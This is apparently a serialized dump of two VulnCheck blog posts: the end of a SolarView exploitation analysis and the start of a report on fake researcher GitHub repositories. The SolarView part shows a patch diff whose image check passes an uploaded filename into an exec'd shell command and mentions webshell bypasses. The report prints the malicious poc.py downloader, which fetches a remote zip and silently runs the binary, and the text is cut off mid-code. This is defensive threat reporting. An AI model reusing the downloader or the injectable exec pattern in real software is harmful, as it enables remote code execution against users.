echo",[1373,94774,4883],{"class":1387},[1373,94776,94777],{"class":1391},"JPEG”;\n",[1373,94779,94780],{"class":1375,"line":1852},[1373,94781,34552],{"class":1391},[1373,94783,94784],{"class":1375,"line":4692},[1373,94785,94786],{"class":1391}," else{\n",[1373,94788,94789,94792,94794,94797,94799,94801,94804,94806,94808,94810,94812,94815,94817,94820],{"class":1375,"line":4724},[1373,94790,94791],{"class":1391},"- copy( ",[1373,94793,4644],{"class":1383},[1373,94795,94796],{"class":4640},"userfile",[1373,94798,1246],{"class":1391},[1373,94800,4644],{"class":1383},[1373,94802,94803],{"class":4640},"IMG_PATH",[1373,94805,59],{"class":1391},[1373,94807,183],{"class":1387},[1373,94809,2180],{"class":1397},[1373,94811,183],{"class":1387},[1373,94813,94814],{"class":1391},".basename(",[1373,94816,4644],{"class":1383},[1373,94818,94819],{"class":4640},"userfile_name",[1373,94821,1413],{"class":1391},[1373,94823,94824,94827,94829,94831,94833,94835,94837,94839,94841,94843,94846,94848],{"class":1375,"line":4756},[1373,94825,94826],{"class":1391},"- echo urldecode(",[1373,94828,4644],{"class":1383},[1373,94830,94819],{"class":4640},[1373,94832,27987],{"class":1391},[1373,94834,183],{"class":1387},[1373,94836,11852],{"class":1397},[1373,94838,25830],{"class":7054},[1373,94840,5384],{"class":1397},[1373,94842,47989],{"class":4640},[1373,94844,94845],{"class":2326},"n",[1373,94847,183],{"class":1387},[1373,94849,4912],{"class":1391},[1373,94851,94852,94855,94857,94859,94861,94863,94865,94867,94869,94871,94873],{"class":1375,"line":4768},[1373,94853,94854],{"class":1391},"- chmod( ",[1373,94856,4644],{"class":1383},[1373,94858,94803],{"class":4640},[1373,94860,59],{"class":1391},[1373,94862,183],{"class":1387},[1373,94864,2180],{"class":1397},[1373,94866,183],{"class":1387},[1373,94868,94814],{"class":1391},[1373,94870,4644],{"class":1383},[1373,94872,94819],{"class":4640},[1373,94874,94875],{"class":1391},"), 0666 );\n",[1373,94877,94878,94881,94883,94886,94888,94890,94892,94894,94896],{"class":1375,"line":4792},[1373,94879,94880],{"class":1391},"- echo ",[1373,94882,4644],{"class":1383},[1373,94884,94885],{"class":4640},"MSG_SEND_OK",[1373,94887,59],{"class":1391},[1373,94889,183],{"class":1387},[1373,94891,47989],{"class":4640},[1373,94893,94845],{"class":2326},[1373,94895,183],{"class":1387},[1373,94897,4912],{"class":1391},[1373,94899,94900,94903,94905,94907,94910,94912,94914,94917,94919,94922,94924,94926,94928,94931,94933,94936,94938,94941,94944,94946,94948,94950],{"class":1375,"line":4798},[1373,94901,94902],{"class":1391},"+ ",[1373,94904,4644],{"class":1383},[1373,94906,17653],{"class":4640},[1373,94908,94909],{"class":1391}," = sprintf(",[1373,94911,183],{"class":1387},[1373,94913,2180],{"class":1397},[1373,94915,94916],{"class":2326},"usr",[1373,94918,2180],{"class":1397},[1373,94920,94921],{"class":2326},"bin",[1373,94923,2180],{"class":1397},[1373,94925,85692],{"class":2326},[1373,94927,78784],{"class":1397},[1373,94929,94930],{"class":2326},"s",[1373,94932,2233],{"class":1397},[1373,94934,94935],{"class":2326}," awk",[1373,94937,4713],{"class":1387},[1373,94939,94940],{"class":1391},"{print $2}",[1373,94942,94943],{"class":1387},"'\"",[1373,94945,5437],{"class":1391},[1373,94947,4644],{"class":1383},[1373,94949,94796],{"class":4640},[1373,94951,94316],{"class":1391},[1373,94953,94954,94956,94958,94961,94964,94966,94968],{"class":1375,"line":4806},[1373,94955,94902],{"class":1391},[1373,94957,4644],{"class":1383},[1373,94959,94960],{"class":4640},"img_type",[1373,94962,94963],{"class":1391}," = exec( ",[1373,94965,4644],{"class":1383},[1373,94967,17653],{"class":4640},[1373,94969,4680],{"class":1391},[1373,94971,94972,94975,94977,94979,94982,94984,94987,94989,94992,94994,94996,94998,95000,95003,95005,95007,95009,95011,95013,95015,95018,95020,95022,95024,95026,95028,95030,95033,95035],{"class":1375,"line":4817},[1373,94973,94974],{"class":1391},"+ if( ",[1373,94976,4644],{"class":1383},[1373,94978,94960],{"class":4640},[1373,94980,94981],{"class":1391}," == ",[1373,94983,183],{"class":1387},[1373,94985,94986],{"class":2326},"GIF",[1373,94988,183],{"class":1387},[1373,94990,94991],{"class":1391}," || ",[1373,94993,4644],{"class":1383},[1373,94995,94960],{"class":4640},[1373,94997,94981],{"class":1391},[1373,94999,183],{"class":1387},[1373,95001,95002],{"class":2326},"PNG",[1373,95004,183],{"class":1387},[1373,95006,94991],{"class":1391},[1373,95008,4644],{"class":1383},[1373,95010,94960],{"class":4640},[1373,95012,94981],{"class":1391},[1373,95014,183],{"class":1387},[1373,95016,95017],{"class":2326},"JPG",[1373,95019,183],{"class":1387},[1373,95021,94991],{"class":1391},[1373,95023,4644],{"class":1383},[1373,95025,94960],{"class":4640},[1373,95027,94981],{"class":1391},[1373,95029,183],{"class":1387},[1373,95031,95032],{"class":2326},"JPEG",[1373,95034,183],{"class":1387},[1373,95036,93484],{"class":1391},[1373,95038,95039,95042,95044,95046,95048,95050,95052,95054,95056,95058,95060,95062,95064,95066],{"class":1375,"line":4825},[1373,95040,95041],{"class":1391},"+ copy( ",[1373,95043,4644],{"class":1383},[1373,95045,94796],{"class":4640},[1373,95047,1246],{"class":1391},[1373,95049,4644],{"class":1383},[1373,95051,94803],{"class":4640},[1373,95053,59],{"class":1391},[1373,95055,183],{"class":1387},[1373,95057,2180],{"class":1397},[1373,95059,183],{"class":1387},[1373,95061,94814],{"class":1391},[1373,95063,4644],{"class":1383},[1373,95065,94819],{"class":4640},[1373,95067,1413],{"class":1391},[1373,95069,95070,95073,95075,95077,95079,95081,95083,95085,95087,95089,95091,95093],{"class":1375,"line":4835},[1373,95071,95072],{"class":1391},"+ echo urldecode(",[1373,95074,4644],{"class":1383},[1373,95076,94819],{"class":4640},[1373,95078,27987],{"class":1391},[1373,95080,183],{"class":1387},[1373,95082,11852],{"class":1397},[1373,95084,25830],{"class":7054},[1373,95086,5384],{"class":1397},[1373,95088,47989],{"class":4640},[1373,95090,94845],{"class":2326},[1373,95092,183],{"class":1387},[1373,95094,4912],{"class":1391},[1373,95096,95097,95100,95102,95104,95106,95108,95110,95112,95114,95116,95118],{"class":1375,"line":4843},[1373,95098,95099],{"class":1391},"+ chmod( ",[1373,95101,4644],{"class":1383},[1373,95103,94803],{"class":4640},[1373,95105,59],{"class":1391},[1373,95107,183],{"class":1387},[1373,95109,2180],{"class":1397},[1373,95111,183],{"class":1387},[1373,95113,94814],{"class":1391},[1373,95115,4644],{"class":1383},[1373,95117,94819],{"class":4640},[1373,95119,94875],{"class":1391},[1373,95121,95122,95125,95127,95129,95131,95133,95135,95137,95139],{"class":1375,"line":4849},[1373,95123,95124],{"class":1391},"+ echo ",[1373,95126,4644],{"class":1383},[1373,95128,94885],{"class":4640},[1373,95130,59],{"class":1391},[1373,95132,183],{"class":1387},[1373,95134,47989],{"class":4640},[1373,95136,94845],{"class":2326},[1373,95138,183],{"class":1387},[1373,95140,4912],{"class":1391},[1373,95142,95143],{"class":1375,"line":4877},[1373,95144,95145],{"class":1391},"+ }\n",[18,95147,95148,95149,32258,95151,95153],{},"The changes in version 7.00 are trivially bypassed by appending the webshell to a valid image. SolarView version 8.00 adds ",[886,95150,94698],{},[886,95152,93804],{}," list, which at least makes this an authenticated issue now.",[18,95155,95156,95157,982,95159,95162],{},"Both the ",[886,95158,94698],{},[886,95160,95161],{},"\u002Fdownloader.php"," endpoints appear to generate hits from malicious hosts on GreyNoise meaning that they too are likely under some level of active exploitation.",[18,95164,95165],{},[68,95166],{":width":10862,"alt":95167,"src":95168},"SolarView Exploitation on GreyNoise","\u002Fblog\u002Fsolarview-exploitation\u002Fsolarview-exploitation-greynoise.png",[18,95170,95171],{},"Finally, it’s worth noting that these issues are not isolated to the SolarView “Compact” hardware version. The “Air” is also affected (the code is nearly identical) and, likely, the “Battery” hardware version is affected as well.",[1920,95173,1903],{"id":1902},[18,95175,95176,95177,95182,95183,95185],{},"We’ve looked at a few critical CVEs that affect the SolarView series and determined that there are a few hundred internet-facing systems that remain affected by these issues. When considered in isolation, exploitation of this system is not significant. The SolarView series are all monitoring systems, so loss of view (",[47,95178,95181],{"href":95179,"rel":95180},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT0829\u002F",[51],"T0829",") is likely the worst-case scenario.However, the impact of exploitation ",[1131,95184,23604],{}," be high impact depending on the network the SolarView hardware is integrated into.",[18,95187,95188,95189,95194],{},"For instance, if the hardware is part of a solar power generation site, then the attacker may affect loss of productivity and revenue (",[47,95190,95193],{"href":95191,"rel":95192},"https:\u002F\u002Fattack.mitre.org\u002Ftechniques\u002FT0828\u002F",[51],"T0828",") by using the hardware as a network pivot to attack other ICS resources.",[18,95196,95197],{},"The fact that a number of these systems are internet facing and that the public exploits have been available long enough to get rolled into a Mirai-variant is not a good situation. As always, organizations should be mindful of which systems appear in their public IP space and track public exploits for systems that they rely on.",[1920,95199,95201],{"id":95200},"sign-up","Sign Up",[18,95203,95204,95205,95208],{},"For more information on vulnerabilities exploited in the wild, register for a VulnCheck account today by loading ",[47,95206,78319],{"href":78319,"rel":95207},[51]," and clicking “Log In”.",[2901,95210,95211],{},"html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sYThS, html code.shiki .sYThS{--shiki-light:#F76D47;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .s9BUQ, html code.shiki .s9BUQ{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .srJo8, html code.shiki .srJo8{--shiki-light:#9C3EDA;--shiki-light-font-style:inherit;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#66D9EF;--shiki-sepia-font-style:italic}html pre.shiki code .sMTiH, html code.shiki .sMTiH{--shiki-light:#39ADB5;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":95213},[],"VulnCheck analyzes four CVEs that impact SolarView, a solar power monitoring system. We discover the number of internet-facing systems and the likelihood of exploitation in the wild.",{"slug":95216},"solarview-exploitation","\u002Fblog\u002Fsolarview-exploitation",{"title":93271,"description":95214},"blog\u002Fsolarview-exploitation",[1279],"ZBAM-V9VIF5dEBopLcliNQ4pauX8jl_GM93tzV-iw1k",{"id":95223,"title":95224,"articles":95225,"authors":95339,"body":95341,"date":95230,"description":96697,"extension":234,"image":7,"link":7,"meta":96698,"navigation":237,"path":96700,"seo":96701,"series":7,"stem":96702,"subtype":7,"tags":7,"__hash__":96703},"blog\u002Fblog\u002Ffake-repos-deliver-malicious-implant.md","Fake Security Researcher GitHub Repositories Deliver Malicious Implant Blog - VulnCheck",[95226,95231,95234,95238,95239,95242,95245,95248,95251,95254,95258,95262,95265,95269,95273,95277,95280,95283,95287,95289,95292,95296,95300,95302,95305,95308,95312,95317,95320,95324,95328,95331,95335],{"title":95227,"source":95228,"link":95229,"date":95230},"Attackers set up rogue GitHub repos with malware posing as zero-day exploits","ARN (Syndication of CSO)","https:\u002F\u002Fwww.arnnet.com.au\u002Farticle\u002F707650\u002Fattackers-set-up-rogue-github-repos-malware-posing-zero-day-exploits\u002F","2023-06-14",{"title":95232,"source":14373,"link":95233,"date":95230},"Fake zero-day PoC exploits on GitHub push Windows, Linux malware","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F3699710\u002Fattackers-set-up-rogue-github-repos-with-malware-posing-as-zero-day-exploits.html",{"title":95235,"source":95236,"link":95237,"date":95230},"Fake Github PoCs are spreading Windows and Linux malware","Candid.Technology","https:\u002F\u002Fcandid.technology\u002Ffake-github-pocs-windows-linux-malware\u002F",{"title":95227,"source":3486,"link":95233,"date":95230},{"title":95240,"source":19484,"link":95241,"date":95230},"Malicious Actors Exploit GitHub to Distribute Fake Exploits","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fgithub-distribute-fake-exploits\u002F",{"title":95227,"source":95243,"link":95244,"date":95230},"Reseller News (Syndication of CSO)","https:\u002F\u002Fwww.reseller.co.nz\u002Farticle\u002F707650\u002Fattackers-set-up-rogue-github-repos-malware-posing-zero-day-exploits\u002F?fp=2&fpid=1",{"title":95246,"source":12153,"link":95247,"date":95230},"Someone is posing as a fake security company to create malicious GitHub repositories","https:\u002F\u002Fwww.scmagazine.com\u002Fnews\u002Fdevops\u002Fsomeone-is-posing-as-a-fake-security-company-to-create-malicious-github-repositories",{"title":95249,"source":14382,"link":95250,"date":95230},"Fake Researcher Profiles Spread Malware Through GitHub Repositories as PoC Exploits","https:\u002F\u002Fthehackernews.com\u002F2023\u002F06\u002Ffake-researcher-profiles-spread-malware.html",{"title":95252,"source":65365,"link":95253,"date":95230},"Hackers create fake GitHub profiles to deliver malware through repositories","https:\u002F\u002Ftherecord.media\u002Fhackers-create-fake-github-profiles",{"title":95255,"source":93326,"link":95256,"date":95257},"Cyber Security Headlines: China ESXi exploit, WooCommerce vulnerability, Lockbit ransom report","https:\u002F\u002Fcisoseries.com\u002Fcyber-security-headlines-china-esxi-exploit-woocommerce-vulnerability-lockbit-ransom-report\u002F","2023-06-15",{"title":95259,"source":95260,"link":95261,"date":95257},"Ep 1845, Chinese threat actors reel in Barracuda appliances. Diicot: the gang formerly known as Mexals, with Romanian ties. Recent Russian cyberespionage against Ukraine and its sympathizers,","CyberWire Daily Podcast","https:\u002F\u002Fthecyberwire.com\u002Fpodcasts\u002Fdaily-podcast\u002F1845\u002Ftranscript",{"title":95263,"source":60946,"link":95264,"date":95257},"Fake IT security researchers disguise malware as proof-of-concept exploits","https:\u002F\u002Fwww.heise.de\u002Fnews\u002FFalsche-IT-Sicherheitsforscher-tarnen-Malware-als-Proof-of-Concept-Exploits-9188406.html",{"title":95266,"source":95267,"link":95268,"date":95257},"Watch out - a fake security researcher is pushing malware disguised as zero-day PoC","MSN (Syndication of TechRadar)","https:\u002F\u002Fwww.techradar.com\u002Fnews\u002Fwatch-out-a-fake-security-researcher-is-pushing-malware-disguised-as-zero-day-poc",{"title":95270,"source":95271,"link":95272,"date":95257},"Network Security News Summary for Thursday June 15th, 2023,","SANS Internet Storm Center’s Daily StormCast podcast","https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=5n-Jci6BVc4",{"title":95274,"source":95275,"link":95276,"date":95257},"Fake company created malicious GitHub repositories","SC Media DailyScan","https:\u002F\u002Fpages.scmagazine.com\u002Findex.php\u002Femail\u002FemailWebview?md_id=13822",{"title":95278,"source":14378,"link":95279,"date":95257},"Fake Security Researcher Accounts Pushing Malware Disguised as Zero-Day Exploits","https:\u002F\u002Fwww.securityweek.com\u002Ffake-security-researcher-accounts-pushing-malware-disguised-as-zero-day-exploits\u002F",{"title":95281,"source":81099,"link":95282,"date":95257},"Beware of fake security researchers who deliver malware","https:\u002F\u002Fsiliconangle.com\u002F2023\u002F06\u002F15\u002Fbeware-fake-security-researchers-deliver-malware\u002F",{"title":95284,"source":95285,"link":95286,"date":95257},"Hackers impersonate security analysts to advertise bogus zero day exploits laced with malware","Tech Monitor","https:\u002F\u002Ftechmonitor.ai\u002Ftechnology\u002Fcybersecurity\u002Fbogus-zero-day-exploits-laced-with-malware-to-scam-researchers",{"title":95266,"source":95288,"link":95268,"date":95257},"TechRadar Pro",{"title":95290,"source":39566,"link":95291,"date":95257},"Daily Briefing V12 Issue 115","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F115",{"title":95293,"source":11218,"link":95294,"date":95295},"Attackers Create Synthetic Security Researchers to Steal IP","https:\u002F\u002Fwww.darkreading.com\u002Fattacks-breaches\u002Fattackers-create-synthetic-security-researchers","2023-06-16",{"title":95297,"source":95298,"link":95299,"date":95295},"Several U.S. federal departments hit by MOVEit hack","IT Business Canada","https:\u002F\u002Fwww.itbusiness.ca\u002Fnews\u002Fbreaking-news-several-u-s-federal-departments-hit-by-moveit-hack\u002F125325",{"title":95297,"source":84047,"link":95301,"date":95295},"https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fbreaking-news-several-u-s-federal-departments-hit-by-moveit-hack\u002F541120",{"title":95303,"source":89966,"link":95304,"date":95295},"June 16, 2023 – Beware of fake profiles on GitHub, and are you an optimist or pessimist CISO?","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-june-16-2023-beware-of-fake-profiles-on-github-and-are-you-an-optimist-or-pessimist-ciso\u002F541139",{"title":95306,"source":3494,"link":95307,"date":95295},"Risky Biz News: LockBit gang made $91 million from US attacks","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Frisky-biz-news-lockbit-gang-made?utm_source=post-email-title&publication_id=852612&post_id=128597268&isFreemail=true&utm_medium=email",{"title":95309,"source":12145,"link":95310,"date":95311},"Warning: Fake GitHub Repos Delivering Malware as PoCs","https:\u002F\u002Fwww.hackread.com\u002Ffake-github-repos-drop-malware-pocs\u002F","2023-06-17",{"title":95313,"source":95314,"link":95315,"date":95316},"Guess what happened to this US agency using outdated software?","MSN (The Register Syndication)","https:\u002F\u002Fwww.msn.com\u002Fen-us\u002Fnews\u002Ftechnology\u002Fguess-what-happened-to-this-us-agency-using-outdated-software\u002Far-AA1cKmQ6?ocid=Peregrine","2023-06-19",{"title":95318,"source":3481,"link":95319,"date":95316},"Guess what happened to this US agency that didn't patch?","https:\u002F\u002Fwww.theregister.com\u002F2023\u002F06\u002F19\u002Fold_telerik_bug_exploited\u002F",{"title":95321,"source":19484,"link":95322,"date":95323},"Millions Face RepoJacking Risk on GitHub Repositories","https:\u002F\u002Fwww.infosecurity-magazine.com\u002Fnews\u002Fmillions-face-repojacking-risk\u002F","2023-06-26",{"title":95325,"source":81116,"link":95326,"date":95327},"THIS WEEK IN SECURITY:CAMARO DRAGON, ROWPRESS, AND REPOJACKING","https:\u002F\u002Fhackaday.com\u002F2023\u002F06\u002F30\u002Fthis-week-in-securitycamaro-dragon-rowpress-and-repojacking\u002F","2023-06-30",{"title":95329,"source":14382,"link":95330,"date":93368},"Fake PoC for Linux Kernel Vulnerability on GitHub Exposes Researchers to Malware","https:\u002F\u002Fthehackernews.com\u002F2023\u002F07\u002Fblog-post.html",{"title":95332,"source":11233,"link":95333,"date":95334},"Fake PoC on GitHub lures security researchers to download malware","https:\u002F\u002Fwww.scmagazine.com\u002Fnews\u002Fdevops\u002Ffake-poc-github-backdoor","2023-07-14",{"title":95336,"source":58433,"link":95337,"date":95338},"North Korea’s ScarCruft APT group targets infosec pros","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F1296496\u002Fnorth-koreas-scarcruft-apt-group-targets-infosec-pros.html","2024-01-22",[95340],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":95342,"toc":96692},[95343,95347,95359,95368,95371,95377,95386,95389,95395,95398,95404,95410,96517,96540,96545,96551,96560,96563,96567,96611,96615,96659,96663,96689],[263,95344],{":list":95345,"ico":266,"title":95346},"[\"In early May, VulnCheck came across a malicious GitHub repository that claimed to be a Signal 0-day. The team reported the repository to GitHub, and it was quickly taken down. The same scenario continued throughout May.\",\"Recently, the individuals creating these repositories have put significant effort into making them look legitimate by creating a network of accounts and Twitter profiles, pretending to be part of a non-existent company called High Sierra Cyber Security, and even using headshots of legitimate security researchers from companies like Rapid7.\",\"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product, including Chrome, Exchange, Discord, and more. Some of the accounts even advertise their “findings” on Twitter.\",\"Security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. Always review the code you are executing, and don’t use anything you don’t understand.\"]","Fake Security Researcher GitHub Repositories Deliver Malicious Implant",[18,95348,95349,95350,95353,95354,95358],{},"As part of VulnCheck’s ",[47,95351,42306],{"href":214,"rel":95352},[51]," offering, we monitor and review large amounts of GitHub repositories. The review process exists to filter out useless, malicious, and\u002For scam repositories. In early May, during routine reviews, we came across an obviously malicious GitHub ",[47,95355,22188],{"href":95356,"rel":95357},"https:\u002F\u002Fgithub.com\u002Fresearchkendra91\u002Fsignal-zeroday-exploit",[51]," that claimed to be a Signal 0-day. We reported the repository to GitHub, and it was quickly taken down.",[18,95360,95361,95362,95367],{},"The very next day, an almost identical repository was created under a different account, but this time claiming to be a ",[47,95363,95366],{"href":95364,"rel":95365},"https:\u002F\u002Fgithub.com\u002Fdarthvander20\u002Fwhatsapp-zero-day-exploit\u002Fblob\u002Fmain\u002Fpoc.py",[51],"WhatsApp zero-day",". Again, we worked with GitHub to get the repository taken down. This process kept repeating itself throughout May.",[18,95369,95370],{},"More recently, however, the individual(s) creating these repositories have put more effort into making them look legitimate by creating a network of accounts. The attacker has created half a dozen GitHub accounts and a handful of associated Twitter accounts. The accounts all pretend to be part of a non-existent security company called High Sierra Cyber Security. Below is an example of one such account:",[18,95372,95373],{},[68,95374],{":width":10862,"alt":95375,"src":95376},"GSanderson","\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fsanderson.png",[18,95378,95379,95380,95385],{},"The profile looks like a normal security researcher account. The account has a headshot, followers, an associated organization, a Twitter handle, and a (dead) link to the company’s website. However, we recognized “Andrei Kuzman” was using a headshot of a ",[47,95381,95384],{"href":95382,"rel":95383},"https:\u002F\u002Fwww.rapid7.com\u002Fglobalassets\u002F_images\u002Fpeople\u002Fcurt-barnard1.png",[51],"Rapid7 employee",". So it appears the attacker is not only making efforts to make the profiles look legitimate, but also using headshots of actual security researchers.",[18,95387,95388],{},"Each High Sierra Cyber Security account contains a malicious repository claiming to be an exploit for a well-known product: Chrome, Exchange, Discord, etc. Some of the accounts even advertise their “findings” on Twitter:",[18,95390,95391],{},[68,95392],{":width":10862,"alt":95393,"src":95394},"Kuzman","\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fkuzman.png",[18,95396,95397],{},"The repositories all follow a very simple formula. They all look like the following image (including tagging of “hot” CVE to attract victims):",[18,95399,95400],{},[68,95401],{":width":10862,"alt":95402,"src":95403},"Repo Layout","\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Flayout.png",[18,95405,95406,95409],{},[886,95407,95408],{},"poc.py"," contains the code to download a malicious binary, and then execute it. The python script will download a different payload depending on the victim’s host operating system. The above Discord “0-day” uses the following code to perform these actions:",[1354,95411,95413],{"className":11719,"code":95412,"language":11721,"meta":219,"style":219},"if __name__ == '__main__':\n if os.name == 'nt':\n try:\n namezip = \"cveswindows.zip\"\n name = \"cveswindows\"\n url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip\"\n des = os.path.join(os.environ['TMP'], namezip)\n if not os.path.exists(os.path.join(os.environ['TMP'], name, name + \".exe\")):\n urllib.request.urlretrieve(url, des)\n with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n zf = ZipFile(des, 'r')\n zf.extractall(os.path.join(os.environ['TMP'], name))\n zf.close()\n pid = subprocess.Popen([os.path.join(os.environ['TMP'], name, name + \".exe\")], creationflags=0x00000008 | subprocess.CREATE_NO_WINDOW).pid\n except:\n pass\n else:\n url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip\"\n namezip = \"cveslinux.zip\"\n name = \"cveslinux\"\n\n des = os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", namezip)\n if not os.path.exists(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)):\n urllib.request.urlretrieve(url, des)\n with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n zf = ZipFile(des, 'r')\n zf.extractall(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name))\n zf.close()\n st = os.stat(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name))\n os.chmod(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name), st.st_mode | stat.S_IEXEC)\n subprocess.Popen([\"\u002Fbin\u002Fbash\", \"-c\", os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)], start_new_session=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n\n main()\n",[886,95414,95415,95431,95451,95458,95472,95486,95500,95542,95607,95632,95693,95717,95761,95771,95858,95865,95870,95876,95890,95904,95918,95922,95982,96054,96077,96132,96155,96216,96226,96296,96381,96502,96506,96510],{"__ignoreMap":219},[1373,95416,95417,95419,95421,95423,95425,95427,95429],{"class":1375,"line":1376},[1373,95418,4637],{"class":4636},[1373,95420,89309],{"class":9383},[1373,95422,16406],{"class":1397},[1373,95424,4713],{"class":1387},[1373,95426,89302],{"class":1391},[1373,95428,1388],{"class":1387},[1373,95430,11747],{"class":1383},[1373,95432,95433,95435,95437,95439,95441,95443,95445,95447,95449],{"class":1375,"line":220},[1373,95434,4695],{"class":4636},[1373,95436,63565],{"class":4640},[1373,95438,59],{"class":1383},[1373,95440,30774],{"class":63570},[1373,95442,16406],{"class":1397},[1373,95444,4713],{"class":1387},[1373,95446,46421],{"class":1391},[1373,95448,1388],{"class":1387},[1373,95450,11747],{"class":1383},[1373,95452,95453,95456],{"class":1375,"line":1266},[1373,95454,95455],{"class":4636}," try",[1373,95457,11747],{"class":1383},[1373,95459,95460,95463,95465,95467,95470],{"class":1375,"line":1852},[1373,95461,95462],{"class":4640}," namezip ",[1373,95464,5417],{"class":1397},[1373,95466,4883],{"class":1387},[1373,95468,95469],{"class":1391},"cveswindows.zip",[1373,95471,19057],{"class":1387},[1373,95473,95474,95477,95479,95481,95484],{"class":1375,"line":4692},[1373,95475,95476],{"class":4640}," name ",[1373,95478,5417],{"class":1397},[1373,95480,4883],{"class":1387},[1373,95482,95483],{"class":1391},"cveswindows",[1373,95485,19057],{"class":1387},[1373,95487,95488,95491,95493,95495,95498],{"class":1375,"line":4724},[1373,95489,95490],{"class":4640}," url 